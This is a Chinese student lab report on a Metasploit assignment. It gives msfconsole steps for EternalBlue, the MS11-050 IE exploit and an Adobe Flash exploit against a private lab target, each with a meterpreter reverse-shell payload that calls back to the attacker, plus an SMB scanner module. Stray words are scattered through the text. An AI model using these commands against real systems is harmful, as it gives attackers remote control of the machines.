本實踐目標是掌握metasploit的基本應用方式,重點經常使用的三種攻擊方式的思路。具體須要完成:
1.1一個主動攻擊實踐,如ms08_067; (1分)
1.2 一個針對瀏覽器的攻擊,如ms11_050;(1分)
1.3 一個針對客戶端的攻擊,如Adobe;(1分)
1.4 成功應用任何一個輔助模塊。(0.5分)
以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分html
exploit: 設至關於利用漏洞打開的通道,將作好的木馬病毒等順利傳輸到靶機。
payload: 簡單來講就是病毒代碼包裝成一個可執行的文件(任意指定類型),而後經過通道傳輸爲獲取靶機權限作準備。
encode: 針對payload進行編碼,改變payload代碼特徵(例如不出現「0x00」的特殊機器碼等),可是不改變payload爲咱們所用的特徵,能對payload進行加工。shell
nmap -O -Pn 192.168.239.129
msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.239.129 msf auxiliary(scanner/smb/smb_ms17_010) > run
輸入back
退回,而後依次輸入:windows
use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.239.131 set RHOST 192.168.239.129 exploit
打開MSF,依次輸入:瀏覽器
use windows/browser/ms11_050_mshtml_cobjectelement set payloadwindows/meterpreter/reverse_http set LHOST 192.168.239.131 set LPORT 5313 exploit
在靶機上打開生成的URL,發現報錯,猜想多是漏洞和IE版本問題
安全
主要步驟和(1)中大體相同,就是修改一下調用的名稱。注意:須要添加的指令AllowPowershellprompt---true並將http連接改爲tcp連接
網絡
生成URL並開啓監聽服務:
session
靶機打開IE瀏覽器,輸入網址:
tcp
攻擊機回連成功,輸入sessions -i獲取對話:
編碼
(1)輸入search abode
spa
(2)根據要求進行配置:
use exploit/windows/browser/abode_flash_avm2 set srvhost 192.168.239.131 set lhost 192.168.239.131 set payloadwindows/meterpreter/reverse_tcp
(3)在靶機裏下載adobe_flash_11。
(4)輸入exploit:
(5)在靶機裏登陸生成出來的地址:
(6)獲取權限:
(1)seach
尋找模塊:
(2)根據要求配置:
第一次掃描的是一個網段(設置及結果以下):
第二次掃描靶機:
本次試驗在我看來爲漏洞尋找合適的靶機是一件很費時間的事情,須要足夠的耐心,第二就是如何正確利用MSF的輔助功能爲攻擊作好鋪墊,仍然須要大量反覆的實踐,否則所掌握的東西僅僅知識一點點皮毛而已。同時我發現想要利用一個漏洞進行攻擊也不是一件容易的事情,由於一個漏洞不可能對全部狀況都適用,因此攻擊方不只僅是要找合適的漏洞,也要爲漏洞找合適的機器或程序。矛和盾的較量看來還要持續好久好久。